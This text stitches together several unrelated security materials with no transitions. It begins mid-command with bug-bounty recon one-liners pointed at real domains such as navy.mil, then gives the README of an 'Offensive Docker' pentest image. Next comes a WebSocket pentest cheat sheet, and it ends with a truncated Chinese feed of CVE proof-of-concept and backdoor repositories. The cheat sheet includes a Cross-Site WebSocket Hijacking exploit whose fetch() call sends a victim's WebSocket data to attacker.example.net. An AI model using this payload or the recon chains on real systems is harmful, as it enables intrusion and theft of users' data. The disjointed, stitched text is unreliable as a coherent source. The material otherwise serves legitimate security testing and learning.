xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
<!-- markdownlint-disable MD033 MD041 --> <p align="center"> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"> <img alt="Offensive Docker" src="https://github.com/aaaguirrep/offensive-docker/blob/master/img/banner.jpg" width="600" /> </a> </p> <br/> <p align="center"> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub code size in bytes" src="https://img.shields.io/github/languages/code-size/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub repo size" src="https://img.shields.io/github/repo-size/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub issues" src="https://img.shields.io/github/issues/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker/graphs/contributors"><img alt="GitHub contributors" src="https://img.shields.io/github/contributors/aaaguirrep/offensive-docker"> <a href="https://github.com/aaaguirrep/offensive-docker/blob/master/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/aaaguirrep/offensive-docker"></a> </p> <p align="center"> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Automated build" src="https://img.shields.io/docker/automated/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Pulls" src="https://img.shields.io/docker/pulls/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Size (latest by date)" src="https://img.shields.io/docker/image-size/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Version (latest by date)" src="https://img.shields.io/docker/v/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Stars" src="https://img.shields.io/docker/stars/aaaguirrep/offensive-docker"></a> </p> <p align="center"> <a href="https://discord.gg/2uBfu8E"><img alt="Discord" src="https://img.shields.io/discord/749093790676942888"></a> </p> Offensive Docker is an image with the more used tools to create an pentest environment easily and quickly. :arrow_right: **Note:** Check out the next repo to know how to launch offensive docker in a VPS in Google Cloud Platform or Digital Ocean (free credit included). [Offensive Docker VPS](https://github.com/aaaguirrep/offensive-docker-vps) ### Table of Contents - [Links](#links) - [Features](#features) - [Requirements](#requirements) - [Tools installed](#tools-installed) - [Operative system tools](#operative-system-tools) - [Network tools](#network-tools) - [Developer tools](#developer-tools) - [:hocho: Offensive tools](#hocho-offensive-tools) - [Port scanning](#port-scanning) - [:mag: Recon](#mag-recon) - [Subdomains](#subdomains) - [Subdomain takeover](#subdomain-takeover) - [DNS Lookups](#dns-lookups) - [:camera: Screenshot](#camera-screenshot) - [:spider_web: Crawler](#spider_web-crawler) - [:file_folder: Search directories](#file_folder-search-directories) - [Fuzzer](#fuzzer) - [Web Scanning](#web-scanning) - [CMS](#cms) - [Search JS](#search-js) - [Wordlist](#wordlist) - [Git repositories](#git-repositories) - [OWASP](#owasp) - [:iphone: Mobile](#iphone-mobile) - [Brute force](#brute-force) - [Cracking](#cracking) - [OS Enumeration](#os-enumeration) - [Exploits](#exploits) - [Windows](#windows) - [Reverse shell](#reverse-shell) - [Other resources](#other-resources) - [Custom functions](#custom-functions) - [Other services](#other-services) - [Reporting tools](#reporting-tools) - [:memo: Documentation](#memo-documentation) - [:hammer_and_wrench: Usage](#hammer_and_wrench-usage) - [Option 1 - Use the github repository](#option-1---use-the-github-repository) - [Option 2 - Use the image from docker hub](#option-2---use-the-image-from-docker-hub) - [Considerations to run the container](#considerations-to-run-the-container) - [:gear: Nice configurations](#gear-nice-configurations) - [1. Configure credentials in the docker](#1-configure-credentials-in-the-docker) - [2. Alias to connect to HTB (Hack the Box) VPN](#2-alias-to-connect-to-htb-hack-the-box-vpn) - [Option 1 - HTB VPN using github repository](#option-1---htb-vpn-using-github-repository) - [Option 2 - HTB VPN using docker hub image](#option-2---htb-vpn-using-docker-hub-image) - [3. Save and load command history in your local environment](#3-save-and-load-command-history-in-your-local-environment) - [Option 1 - Command history using github repository](#option-1---command-history-using-github-repository) - [Option 2 - Command history using docker hub image](#option-2---command-history-using-docker-hub-image) - [:white_check_mark: Environment tested](#white_check_mark-environment-tested) - [:warning: Warning](#warning-warning) - [:coffee: Donations](#coffee-donations) - [Contributors](#contributors) - [Contributing](#contributing) - [:chart_with_upwards_trend: Stargazers over time](#chart_with_upwards_trend-stargazers-over-time) - [License](#license) ## Links - 🎬 Video: [Demos](https://asciinema.org/~aaaguirrep) - 💬 Chat: [Discord](https://discord.gg/2uBfu8E) - 🌟 [VPS Automation](https://github.com/aaaguirrep/offensive-docker-vps) - 👉 [Advanced configurations](https://github.com/aaaguirrep/offensive-docker-custom) ## Features - OS, networking, developing and pentesting tools installed. - Connection to HTB (Hack the Box) vpn to access HTB machines. - Popular wordlists installed: SecLists, dirb, dirbuster, fuzzdb, wfuzz and rockyou. - Proxy service to send traffic from any browsers and burp suite installed in your local directory. - Exploit database installed. - Tool for cracking password. - Linux enumeration tools installed. - Tools installed to discovery services running. - Tools installed to directory fuzzing. - Monitor for linux processes without root permissions - Zsh shell installed. ## Requirements - Docker service installed ## Tools installed ### Operative system tools - rdate - vim - zsh - oh-my-zsh - locate - cifs-utils - htop - tree - [gotop](https://github.com/cjbassi/gotop) - fcrackzip ### Network tools - traceroute - telnet - net-tools - iputils-ping - tcpdump - openvpn - whois - host - prips - dig ### Developer tools - git - curl - wget - ruby - go - python - python-pip - python3 - python3-pip - php - aws-cli - [tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - nodejs ### :hocho: Offensive tools #### Port scanning - [nmap](https://github.com/nmap/nmap) - [masscan](https://github.com/robertdavidgraham/masscan) - [naabu](https://github.com/projectdiscovery/naabu) #### :mag: Recon ##### Subdomains - [Amass](https://github.com/OWASP/Amass) - [GoBuster](https://github.com/OJ/gobuster) - [Knock](https://github.com/guelfoweb/knock) - [MassDNS](https://github.com/blechschmidt/massdns) - [Altdns](https://github.com/infosec-au/altdns) - [spyse](https://github.com/zeropwn/spyse.py) - [Sublist3r](https://github.com/aboul3la/Sublist3r) - [findomain](https://github.com/Edu4rdSHL/findomain) - [subfinder](https://github.com/projectdiscovery/subfinder) - [spiderfoot](https://github.com/smicallef/spiderfoot) - [haktldextract](https://github.com/hakluke/haktldextract) ##### Subdomain takeover - [subjack](https://github.com/haccer/subjack) - [SubOver](https://github.com/Ice3man543/SubOver) - [tko-subs](https://github.com/anshumanbh/tko-subs) ##### DNS Lookups - [hakrevdns](https://github.com/hakluke/hakrevdns) ##### :camera: Screenshot - [gowitness](https://github.com/sensepost/gowitness) - [aquatone](https://github.com/michenriksen/aquatone) ##### :spider_web: Crawler - [hakrawler](https://github.com/hakluke/hakrawler) - [Photon](https://github.com/s0md3v/Photon) - [gospider](https://github.com/jaeles-project/gospider) - [gau](https://github.com/lc/gau) - [otxurls](https://github.com/lc/otxurls) - [waybackurls](https://github.com/tomnomnom/waybackurls) ##### :file_folder: Search directories - [dirsearch](https://github.com/maurosoria/dirsearch) ##### Fuzzer - [wfuzz](https://github.com/xmendez/wfuzz) - [ffuf](https://github.com/ffuf/ffuf) ##### Web Scanning - [whatweb](https://github.com/urbanadventurer/WhatWeb) - [wafw00z](https://github.com/EnableSecurity/wafw00f) - [nikto](https://github.com/sullo/nikto) - [arjun](https://github.com/s0md3v/Arjun) - [httprobe](https://github.com/tomnomnom/httprobe) - [striker](https://github.com/s0md3v/Striker) - [hakcheckurl](https://github.com/hakluke/hakcheckurl) - [httpx](https://github.com/projectdiscovery/httpx) ##### CMS - [wpscan](https://github.com/wpscanteam/wpscan) - [joomscan](https://github.com/rezasp/joomscan) - [droopescan](https://github.com/droope/droopescan) - [cmseek](https://github.com/Tuhinshubhra/CMSeeK) ##### Search JS - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [getJS](https://github.com/003random/getJS) - [subjs](https://github.com/lc/subjs) #### Wordlist - [cewl](https://github.com/digininja/CeWL) - wordlists: - [wfuzz](https://github.com/xmendez/wfuzz) - [SecList](https://github.com/danielmiessler/SecLists) - [Fuzzdb](https://github.com/fuzzdb-project/fuzzdb) - [Dirbuster](https://github.com/daviddias/node-dirbuster) - [Dirb](https://github.com/v0re/dirb) - [Rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) - [all.txt](https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a) - crunch #### Git repositories - [gitleaks](https://github.com/zricethezav/gitleaks) - [gitrob](https://github.com/michenriksen/gitrob) - [gitGraber](https://github.com/hisxo/gitGraber) - [github-search](https://github.com/gwen001/github-search) - [GitTools](https://github.com/internetwache/GitTools) #### OWASP - [sqlmap](https://github.com/sqlmapproject/sqlmap) - [XSStrike](https://github.com/s0md3v/XSStrike) - [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss) - [dalfox](https://github.com/hahwul/dalfox) - [jwt_tool](https://github.com/ticarpi/jwt_tool) - [jaeles](https://github.com/jaeles-project/jaeles) #### :iphone: Mobile - [apktool](https://ibotpeaches.github.io/Apktool/) #### Brute force - [crowbar](https://github.com/galkan/crowbar) - [hydra](https://github.com/vanhauser-thc/thc-hydra) - [patator](https://github.com/lanjelot/patator) - medusa #### Cracking - [hashid](https://github.com/psypanda/hashID) - [john the ripper](https://github.com/magnumripper/JohnTheRipper) - [hashcat](https://github.com/hashcat/hashcat) #### OS Enumeration - [htbenum](https://github.com/SolomonSklash/htbenum) - [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration) - [linenum](https://github.com/rebootuser/LinEnum) - [enum4linux](https://github.com/portcullislabs/enum4linux) - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - [PEASS - Privilege Escalation Awesome Scripts SUITE](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng) - [smbmap](https://github.com/ShawnDEvans/smbmap) - [pspy - unprivileged Linux process snooping](https://github.com/DominicBreuker/pspy) - smbclient - ftp #### Exploits - [searchsploit](https://github.com/offensive-security/exploitdb) - [Metasploit](https://github.com/rapid7/metasploit-framework) - [MS17-010](https://github.com/worawit/MS17-010) - [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) - [PrivExchange](https://github.com/dirkjanm/PrivExchange) #### Windows - [evil-winrm](https://github.com/Hackplayers/evil-winrm) - [impacket](https://github.com/SecureAuthCorp/impacket) - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - [Nishang](https://github.com/samratashok/nishang) - [Juicy Potato](https://github.com/ohpe/juicy-potato) - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - [pass-the-hash](https://github.com/byt3bl33d3r/pth-toolkit) - [mimikatz](https://github.com/gentilkiwi/mimikatz) - gpp-decrypt - Netcat executables - Plink executables #### Reverse shell - [netcat](https://github.com/diegocr/netcat) - [rlwrap](https://github.com/hanslub42/rlwrap) #### Other resources - [pentest-tools](https://github.com/gwen001/offensive-tools) from [@gwen001](https://github.com/gwen001) - [qsreplace](https://github.com/tomnomnom/qsreplace) from [@tomnomnom](https://github.com/tomnomnom) ### Custom functions - NmapExtractPorts from [@s4vitar](https://github.com/s4vitar) ### Other services - apache2 - squid - ssh - rsyslog ### Reporting tools - Latex ## :memo: Documentation See the project's [wiki](https://github.com/aaaguirrep/offensive-docker/wiki) for documentation. ## :hammer_and_wrench: Usage You can use the docker image by the next two options: ### Option 1 - Use the github repository git clone --depth 1 https://github.com/aaaguirrep/offensive-docker.git cd offensive-docker docker build -t offensive-docker . docker run --rm -it --name my-offensive-docker offensive-docker /bin/zsh ### Option 2 - Use the image from docker hub Use image from docker hub: [aaaguirrep/offensive-docker](https://hub.docker.com/r/aaaguirrep/offensive-docker) docker pull aaaguirrep/offensive-docker docker run --rm -it --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh ### Considerations to run the container There are differents use cases for use the image and you should know how to run the container properly. 1. Use the container to access HTB (Hack the Box) machines by HTB vpn. docker run --rm -it --cap-add=NET_ADMIN --device=/dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 2. Share information from your local directory to container directory and save information on your local directory. You should save information under /offensive directory. docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 3. Expose internal container services (apache, squid) for your local environment. docker run --rm -it --name my-offensive-docker -p 80:80 -p 3128:3128 aaaguirrep/offensive-docker /bin/zsh Inside the container start apache2 and squid services by the aliases. apacheUp squidUp 4. Mount directories by umount command. docker run --rm -it --privileged --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 5. Tools are downloaded in /tools directory. ## :gear: Nice configurations You can set up the docker image with nice configurations like as: ### 1. Configure credentials in the docker To use access keys, tokens or API Keys in the docker review the next repo [Offensive Docker Custom](https://github.com/aaaguirrep/offensive-docker-custom) ### 2. Alias to connect to HTB (Hack the Box) VPN To use both options you should use -v option to map local directoty with /offensive container directory. #### Option 1 - HTB VPN using github repository Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container with the -v option. RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc #### Option 2 - HTB VPN using docker hub image Create a new Dockerfile with the next steps, build a new image and run a new container with -v option. FROM aaaguirrep/offensive-docker # Create a shortcut and load the ovpn file from workstation RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc ### 3. Save and load command history in your local environment When you delete a container all information is deleted incluide command history. The next configuration provides you an option for save the command history in your local environment and load it when you run a new container. So, you wont lose your command history when run a new container. To use both options you should use -v option to map local directoty with /offensive container directory. #### Option 1 - Command history using github repository Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container. # Save and load command history in your local environment RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc #### Option 2 - Command history using docker hub image Create a new Dockerfile with the next steps, build a new image and run a new container. FROM aaaguirrep/offensive-docker # Save and load command history in your local environment RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc ## :white_check_mark: Environment tested The image was tested in the following environments: - Docker service for Mac ```Docker version 19.03.13, build 4484c46d9d``` - Docker service for Linux instance on Google Cloud Platform ```Docker version 19.03.6, build 369ce74a3c``` - Docker service for Linux droplet on Digital Ocean ```Docker version 19.03.6, build 369ce74a3c``` ## :warning: Warning - Do not save information on container directories because it will be lost after delete the container, you should save information in your local environment using the parameter -v when you run the container. For instance: docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh The above command specify a path local directory mapped with /offensive container directory. You should save all information under /offensive directory. - Use hashcat and john the ripper on controlled environments as CTF. You can experiment issues. ## :coffee: Donations Thanks for your donations, are always appreciated. While I drink the coffee I check more tools to add in the docker image. [![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/aaaguirrep) ## Contributors Thank you to all our [contributors](https://github.com/aaaguirrep/offensive-docker/graphs/contributors)! ## Contributing [Contributing Guide](CONTRIBUTING.md) ## :chart_with_upwards_trend: Stargazers over time [![Stargazers over time](https://starchart.cc/aaaguirrep/offensive-docker.svg)](https://starchart.cc/aaaguirrep/offensive-docker) ## License [MIT](LICENSE) Copyright (c) 2020, Arsenio Aguirre
# Web Sockets > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server ## Summary * [Tools](#tools) * [Exploit](#exploit) * [Using wsrepl](#using-wsrepl) * [Using ws-harness.py](#using-ws-harness-py) * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) * [Labs](#labs) * [References](#references) ## Tools * [doyensec/wsrepl](https://github.com/doyensec/wsrepl) - WebSocket REPL for pentesters * [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) ## Exploit ### Using wsrepl `wsrepl`, a tool developed by Doyensec, aims to simplify the auditing of websocket-based apps. It offers an interactive REPL interface that is user-friendly and easy to automate. The tool was developed during an engagement with a client whose web application heavily relied on WebSockets for soft real-time communication. wsrepl is designed to provide a balance between an interactive REPL experience and automation. It is built with Python’s TUI framework Textual, and it interoperates with curl’s arguments, making it easy to transition from the Upgrade request in Burp to wsrepl. It also provides full transparency of WebSocket opcodes as per RFC 6455 and has an automatic reconnection feature in case of disconnects. ```ps1 pip install wsrepl wsrepl -u URL -P auth_plugin.py ``` Moreover, wsrepl simplifies the process of transitioning into WebSocket automation. Users just need to write a Python plugin. The plugin system is designed to be flexible, allowing users to define hooks that are executed at various stages of the WebSocket lifecycle (init, on_message_sent, on_message_received, ...). ```py from wsrepl import Plugin from wsrepl.WSMessage import WSMessage import json import requests class Demo(Plugin): def init(self): token = requests.get("https://example.com/uuid").json()["uuid"] self.messages = [ json.dumps({ "auth": "session", "sessionId": token }) ] async def on_message_sent(self, message: WSMessage) -> None: original = message.msg message.msg = json.dumps({ "type": "message", "data": { "text": original } }) message.short = original message.long = message.msg async def on_message_received(self, message: WSMessage) -> None: original = message.msg try: message.short = json.loads(original)["data"]["text"] except: message.short = "Error: could not parse message" message.long = original ``` ### Using ws-harness.py Start `ws-harness` to listen on a web-socket, and specify a message template to send to the endpoint. ```powershell python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt ``` The content of the message should contains the **[FUZZ]** keyword. ```json {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} ``` Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. ```python sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` ## Cross-Site WebSocket Hijacking (CSWSH) If the WebSocket handshake is not correctly protected using a CSRF token or a nonce, it's possible to use the authenticated WebSocket of a user on an attacker's controlled site because the cookies are automatically sent by the browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). Example exploit, hosted on an attacker's server, that exfiltrates the received data from the WebSocket to the attacker: ```html <script> ws = new WebSocket('wss://vulnerable.example.com/messages'); ws.onopen = function start(event) { ws.send("HELLO"); } ws.onmessage = function handleReply(event) { fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'}); } ws.send("Some text sent to the server"); </script> ``` You have to adjust the code to your exact situation. E.g. if your web application uses a `Sec-WebSocket-Protocol` header in the handshake request, you have to add this value as a 2nd parameter to the `WebSocket` function call in order to add this header. ## Labs * [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling) ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) - [Hacktricks - CSWSH](https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh) - [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
# 互联网安全 推荐 | ts | title | url| | --- | --- | ---| # 玄武实验室 推荐 | ts | title | url| | --- | --- | ---| # 安全维基 推荐 | ts | title | url| | --- | --- | ---| | 20230710 | SecWiki周刊(第488期) | https://www.sec-wiki.com/weekly/488| | 20230710 | 关于加强“自媒体”管理的通知 | https://mp.weixin.qq.com/s/4QHdCXHq7md7MqW06SuN9w| # CVE Github 推荐 | ts | cve_id | title | url | cve_detail| | --- | --- | --- | --- | ---| | 20230710T12:28:04Z | CVE-2023-22906 | Proof of Concept for CVE-2023-22906 | https://github.com/nonamecoder/CVE-2023-22906 | | | 20230710T12:27:48Z | CVE-2023-36167 | An issue in AVG AVG Anti-Spyware v.7.5 allows an attacker to execute arbitrary code via a crafted script to the guard.exe component | https://github.com/TraiLeR2/CVE-2023-36167 | | | 20230710T12:27:18Z | CVE-2023-36163 | Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL | https://github.com/TraiLeR2/CVE-2023-36163 | | | 20230710T09:06:53Z | CVE-2023-22809 | Null | https://github.com/asepsaepdin/CVE-2023-22809 | | | 20230710T08:05:39Z | CVE-2021-4034 | Null | https://github.com/asepsaepdin/CVE-2021-4034 | | | 20230710T05:06:04Z | CVE-2023-34362 | POC for CVE-2023-34362 affecting MOVEit Transfer | https://github.com/Malwareman007/CVE-2023-34362 | | | 20230710T04:29:22Z | CVE-2021-3560 | Null | https://github.com/asepsaepdin/CVE-2021-3560 | | | 20230710T04:26:34Z | CVE-2023-32235 | A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. | https://github.com/VEEXH/Ghost-Path-Traversal-CVE-2023-32235- | | | 20230710T02:34:02Z | cve-2022-4543 | Null | https://github.com/sunichi/cve-2022-4543-wrapper | | # klee on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20230710T08:45:38Z | Null | https://github.com/marco6/klee | 0 | 0| | 20230710T07:17:11Z | KLEE Symbolic Execution Engine | https://github.com/klee/klee | 2277 | 629| # s2e on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| # exploit on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20230710T12:20:09Z | A repository of (now patched) SchoolWare exploits | https://github.com/BjarneIO/schoolware-exploits | 0 | 0| | 20230710T11:55:58Z | An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws | https://github.com/r0oth3x49/ghauri | 1266 | 155| | 20230710T11:51:47Z | Null | https://github.com/Fenducchi/ANDROID-JPG-PNG-SILENT-EXPLOIT | 1 | 0| | 20230710T11:45:42Z | Exploit Development and Reverse Engineering with GDB Made Easy | https://github.com/pwndbg/pwndbg | 5721 | 765| | 20230710T11:19:51Z | Stereo Video Super-Resolution via Exploiting View-Temporal Correlations, ACM MM 2021. | https://github.com/XrKang/StereoVSR | 1 | 0| | 20230710T11:10:03Z | Cyber Security ALL-IN-ONE Platform | https://github.com/yaklang/yakit | 5304 | 744| | 20230710T09:53:30Z | Config files for my GitHub profile. | https://github.com/WafflesExploit/WafflesExploit | 1 | 0| | 20230710T09:31:15Z | This Repository is for a roblox exploit. | https://github.com/Windows-10-1234/GhostSploit | 0 | 0| | 20230710T09:29:00Z | Regression is very important topic in Machine Learning and I want to exploit it as much as I can | https://github.com/JakubTabor/Regression | 0 | 0| | 20230710T08:00:37Z | Offensive Web is a documentation website about security research, difficult concepts, bypass and new exploitation techniques. | https://github.com/xanhacks/OffensiveWeb | 3 | 0| # backdoor on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20230710T10:28:23Z | Reconstructive Neuron Pruning for Backdoor Defense (ICML 2023) | https://github.com/bboylyg/RNP | 11 | 0| | 20230710T08:40:15Z | Browser Protector against various stealers, written in C# & C/C++. | https://github.com/AdvDebug/NoMoreCookies | 78 | 7| | 20230710T06:38:08Z | 纸上得来终觉浅,绝知此事要躬行 | https://github.com/QianSilence/BackdoorToolbox | 0 | 0| | 20230710T06:09:18Z | Null | https://github.com/DDNvR/backdoors | 0 | 0| | 20230710T05:19:52Z | FIshShell is a multi-session handler and Windows & Linux backdoor payload generator. It allows users\targets to connect to the server (other machines running the multi-handler) after which the server admin/attacker can join sessions and also get a non-interactive reverse shell. | https://github.com/TriDEntApollO/FishShell | 5 | 1| | 20230710T04:34:15Z | Null | https://github.com/sankari24/backdoor-virus | 0 | 0| | 20230710T02:56:34Z | Null | https://github.com/GhostSec322/BackdoorProject | 0 | 0| # symbolic execution on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20230710T12:45:07Z | radius2 is a fast binary emulation and symbolic execution framework using radare2 | https://github.com/aemmitt-ns/radius | 410 | 28| | 20230710T07:17:11Z | KLEE Symbolic Execution Engine | https://github.com/klee/klee | 2277 | 629| | 20230710T02:16:54Z | A HL Symbolic Execution Engine Prototype for Reachability | https://github.com/EthanJamesLew/SEE-Reach-py | 0 | 0| # big4 on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| # fuzz on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20230710T12:33:59Z | Null | https://github.com/HugoJBello/paper_extensions_fuzzifications | 0 | 0| | 20230710T12:31:49Z | NucleiFuzzer is a powerful automation tool for detecting xss,sqli,ssrf,open-redirect..etc vulnerabilities in web applications | https://github.com/0xKayala/NucleiFuzzer | 368 | 45| | 20230710T11:01:50Z | Null | https://github.com/roosslan/fuzzyClock | 0 | 0| | 20230710T10:50:43Z | A MATLAB code to obtain the prediction output from the developed fuzzy logic model | https://github.com/alhamedy/MATLAB-code-for-fuzzy-output | 0 | 0| | 20230710T10:13:43Z | Null | https://github.com/Josh-codes/fuzzy-broccoli | 0 | 0| | 20230710T09:43:55Z | Community curated list of nuclei templates for finding %unknown% security vulnerabilities. | https://github.com/projectdiscovery/fuzzing-templates | 432 | 59| | 20230710T05:51:34Z | Corpus storage for DLXEmu fuzzers | https://github.com/AMS21/DLXEmu-Corpus | 1 | 0| | 20230710T03:09:56Z | syzkaller is an unsupervised coverage-guided kernel fuzzer | https://github.com/google/syzkaller | 4749 | 1143| | 20230710T01:19:49Z | Null | https://github.com/Phantomn/fuzzing_project | 0 | 0| | 